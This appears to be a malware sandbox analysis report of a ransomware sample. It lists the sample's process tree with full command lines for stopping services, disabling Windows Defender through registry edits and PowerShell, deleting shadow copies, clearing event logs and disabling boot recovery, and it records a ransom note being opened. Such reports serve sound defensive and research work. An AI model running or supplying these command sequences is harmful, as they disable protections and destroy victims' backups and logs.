a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1624 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1624 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1624 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1404 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1404 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1404 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1684 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1684 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1684 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1688 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1688 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1688 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe PID 1628 wrote to memory of 1292 1628 a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:556
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1436
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:640
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1440
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1156
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1060
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1496
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1632
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1136
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1624
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1404
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1684
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1688
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1292
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1776
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1932
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1964
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:332
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1204
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1244
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:892
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:984
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1060
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1884
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1160
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1020
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1996
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1328
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1904
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1416
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1092
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:900
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1720
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:836
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:436
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:876
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1116
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1016
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1772
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1936
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1908
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1744
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1032
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1976
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:676
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1672
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2020
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1764 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:908
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1124 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2064 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2088 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2108
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2128 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2160 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2248
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\SyncClear.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2388
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD59ad30b90d95b927865dcb9b5f08378f4
SHA1fbef6c732e0bee170b0bdb364a9067d0f1bd7432
SHA256b0ee39302e0fb658a806cbef819b6e3a3334cd15220993a8865380ebcef47b2f
SHA51278e2834d7494f289a371ae01ddf7d794a506748f718e6d0b678a4cf24496246fe92c6dcce12c3b9c5df5c4c55aabc91e2a7ec57109a85a529a8477223c0bf40d